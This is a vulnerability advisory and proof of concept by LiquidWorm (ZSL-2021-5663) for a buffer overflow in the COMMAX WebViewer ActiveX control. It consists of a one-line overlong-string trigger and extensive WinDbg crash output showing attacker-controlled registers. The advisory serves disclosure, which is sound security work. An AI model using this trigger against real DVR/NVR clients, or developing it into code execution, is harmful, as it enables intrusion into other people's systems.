COMMAX WebViewer ActiveX Control 2.1.4.5 - 'Commax_WebViewer.ocx' Buffer Overflow

2021-08-27
ID: 104678
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 02.08.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.commax.com

COMMAX WebViewer ActiveX Control 2.1.4.5 (Commax_WebViewer.ocx) Buffer Overflow


Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 2.1.4.5

Summary: COMMAX activex web viewer client (32bit) for COMMAX DVR/NVR.

Desc: The vulnerability is caused due to a boundary error in the
processing of user input, which can be exploited to cause a buffer
overflow when a user inserts overly long array of string bytes
through several functions. Successful exploitation could allow
execution of arbitrary code on the affected node.

Tested on: Microsoft Windows 10 Home (64bit) EN
           Microsoft Internet Explorer 20H2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5663
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5663.php


02.08.2021

--


$ python
>>> "A"*1000 [ToTheClipboard]
>>>#Paste in ID or anywhere

(5220.5b30): Access violation - code c0000005 (!!! second chance !!!)
wow64!Wow64pNotifyDebugger+0x19918:
00007ff9`deb0b530 c644242001      mov     byte ptr [rsp+20h],1 ss:00000000`0c47de00=00
0:038> g
(5220.5b30): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for CNC_Ctrl.DLL - 
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa            rep stos byte ptr es:[edi]
0:038:x86> r
eax=00000000 ebx=00002000 ecx=0000000f edx=00000000 esi=41414141 edi=41414141
eip=0b4d43bf esp=0d78f920 ebp=0d78f930 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
CNC_Ctrl!DllUnregisterServer+0xf5501:
0b4d43bf f3aa            rep stos byte ptr es:[edi]
0:038:x86> !exchain
0d78fac4: CNC_Ctrl!DllUnregisterServer+eca92 (0b4cb950)
0d78fb74: ntdll_76f80000!_except_handler4+0 (76ffad20)
  CRT scope  0, filter: ntdll_76f80000!__RtlUserThreadStart+3cdb7 (77024806)
                func:   ntdll_76f80000!__RtlUserThreadStart+3ce50 (7702489f)
0d78fb8c: ntdll_76f80000!FinalExceptionHandlerPad25+0 (77008a29)
Invalid exception stack at ffffffff
0:038:x86> kb
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
01 0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
02 0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
03 0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7
0:038:x86> d esp
0d78f920  0f 00 00 00 00 00 00 00-dc 2e ff 76 78 c5 7e 0b  ...........vx.~.
0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%[email protected] ...
0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
0:038:x86> d ebp
0d78f930  b0 c9 7e 0b ea 5d 40 0b-41 41 41 41 00 00 00 00  ..~..]@.AAAA....
0d78f940  00 20 00 00 04 00 00 00-78 c5 7e 0b 00 00 00 00  . ......x.~.....
0d78f950  10 5e 0b 75 25 ab 40 0b-ec fa 78 0d 20 00 00 00  .^.u%[email protected] ...
0d78f960  00 69 b7 61 d4 fa 78 0d-00 00 00 00 b8 0d 00 00  .i.a..x.........
0d78f970  10 00 00 00 fe ff ff ff-08 fa 78 0d 57 28 fc 76  ..........x.W(.v
0d78f980  70 3a 9c 09 00 00 00 00-00 00 f5 02 8a 28 fc 76  p:...........(.v
0d78f990  00 00 00 00 00 00 00 00-e0 01 00 00 74 0e 00 00  ............t...
0d78f9a0  8c 0c 00 00 88 0e 00 00-8c 0e 00 00 b8 0d 00 00  ................
0:038:x86> d esi
41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:038:x86> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ie_to_edge_bho.dll - 
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Commax_WebViewer.OCX - 
GetUrlPageData2 (WinHttp) failed: 12002.

DUMP_CLASS: 2

DUMP_QUALIFIER: 0

FAULTING_IP: 
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa            rep stos byte ptr es:[edi]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 0b4d43bf (CNC_Ctrl!DllUnregisterServer+0x000f5501)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 41414141
Attempt to write to address 41414141

FAULTING_THREAD:  00005b30

DEFAULT_BUCKET_ID:  INVALID_POINTER_WRITE

PROCESS_NAME:  IEXPLORE.EXE

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  41414141

FOLLOWUP_IP: 
CNC_Ctrl!DllUnregisterServer+f5501
0b4d43bf f3aa            rep stos byte ptr es:[edi]

WRITE_ADDRESS:  41414141 

WATSON_BKT_PROCSTAMP:  95286d96

WATSON_BKT_PROCVER:  11.0.19041.1

PROCESS_VER_PRODUCT:  Internet Explorer

WATSON_BKT_MODULE:  CNC_Ctrl.DLL

WATSON_BKT_MODSTAMP:  547ed821

WATSON_BKT_MODOFFSET:  1043bf

WATSON_BKT_MODVER:  1.7.0.2

MODULE_VER_PRODUCT:  CNC_Ctrl Module

BUILD_VERSION_STRING:  10.0.19041.1023 (WinBuild.160101.0800)

MODLIST_WITH_TSCHKSUM_HASH:  aadfa1c5bdd8f77b979f6a5b222994db450b715e

MODLIST_SHA1_HASH:  849cfdbdcb18d5749dc41f313fc544a643772db9

NTGLOBALFLAG:  0

PROCESS_BAM_CURRENT_THROTTLED: 0

PROCESS_BAM_PREVIOUS_THROTTLED: 0

APPLICATION_VERIFIER_FLAGS:  0

PRODUCT_TYPE:  1

SUITE_MASK:  784

DUMP_TYPE:  fe

ANALYSIS_SESSION_HOST:  LAB17

ANALYSIS_SESSION_TIME:  08-12-2021 14:20:11.0116

ANALYSIS_VERSION: 10.0.16299.91 amd64fre

THREAD_ATTRIBUTES: 
OS_LOCALE:  ENU

PROBLEM_CLASSES: 

    ID:     [0n301]
    Type:   [@ACCESS_VIOLATION]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Omit
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n274]
    Type:   [INVALID_POINTER_WRITE]
    Class:  Primary
    Scope:  DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
            BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [Unspecified]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

    ID:     [0n152]
    Type:   [ZEROED_STACK]
    Class:  Addendum
    Scope:  BUCKET_ID
    Name:   Add
    Data:   Omit
    PID:    [0x5220]
    TID:    [0x5b30]
    Frame:  [0] : CNC_Ctrl!DllUnregisterServer

BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK

PRIMARY_PROBLEM_CLASS:  APPLICATION_FAULT

LAST_CONTROL_TRANSFER:  from 0b405dea to 0b4d43bf

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
0d78f930 0b405dea 41414141 00000000 00002000 CNC_Ctrl!DllUnregisterServer+0xf5501
0d78f950 0b40ab25 0d78faec 00000020 61b76900 CNC_Ctrl!DllUnregisterServer+0x26f2c
0d78f978 76fc2857 099c3a70 00000000 02f50000 CNC_Ctrl!DllUnregisterServer+0x2bc67
0d78fa08 00000000 00000000 00000000 00000000 ntdll_76f80000!RtlpReAllocateHeapInternal+0xf7


THREAD_SHA1_HASH_MOD_FUNC:  e84e62df4095d241971250198ae18de0797cfdc7

THREAD_SHA1_HASH_MOD_FUNC_OFFSET:  2033316a7c1a92aaeab1ce97e013350953fef546

THREAD_SHA1_HASH_MOD:  6d850af928076b326edbcafdf6dd4f771aafbab5

FAULT_INSTR_CODE:  458baaf3

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  CNC_Ctrl!DllUnregisterServer+f5501

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: CNC_Ctrl

IMAGE_NAME:  CNC_Ctrl.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  547ed821

STACK_COMMAND:  ~38s ; .cxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_WRITE_c0000005_CNC_Ctrl.DLL!DllUnregisterServer

BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_CNC_Ctrl!DllUnregisterServer+f5501

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  CNC_Ctrl.DLL

BUCKET_ID_IMAGE_STR:  CNC_Ctrl.DLL

FAILURE_MODULE_NAME:  CNC_Ctrl

BUCKET_ID_MODULE_STR:  CNC_Ctrl

FAILURE_FUNCTION_NAME:  DllUnregisterServer

BUCKET_ID_FUNCTION_STR:  DllUnregisterServer

BUCKET_ID_OFFSET:  f5501

BUCKET_ID_MODTIMEDATESTAMP:  547ed821

BUCKET_ID_MODCHECKSUM:  357a4b

BUCKET_ID_MODVER_STR:  1.7.0.2

BUCKET_ID_PREFIX_STR:  APPLICATION_FAULT_INVALID_POINTER_WRITE_ZEROED_STACK_

FAILURE_PROBLEM_CLASS:  APPLICATION_FAULT

FAILURE_SYMBOL_NAME:  CNC_Ctrl.DLL!DllUnregisterServer

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/IEXPLORE.EXE/11.0.19041.1/95286d96/CNC_Ctrl.DLL/1.7.0.2/547ed821/c0000005/001043bf.htm?Retriage=1

TARGET_TIME:  2021-08-12T12:21:50.000Z

OSBUILD:  19042

OSSERVICEPACK:  1023

SERVICEPACK_NUMBER: 0

OS_REVISION: 0

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

OSEDITION:  Windows 10 WinNt SingleUserTS Personal

USER_LCID:  0

OSBUILD_TIMESTAMP:  unknown_date

BUILDDATESTAMP_STR:  160101.0800

BUILDLAB_STR:  WinBuild

BUILDOSVER_STR:  10.0.19041.1023

ANALYSIS_SESSION_ELAPSED_TIME:  1d869

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:invalid_pointer_write_c0000005_cnc_ctrl.dll!dllunregisterserver

FAILURE_ID_HASH:  {5e1e375a-c411-e928-cd64-b7f6c07eea3b}

Followup:     MachineOwner
---------
1-4-2 (www02)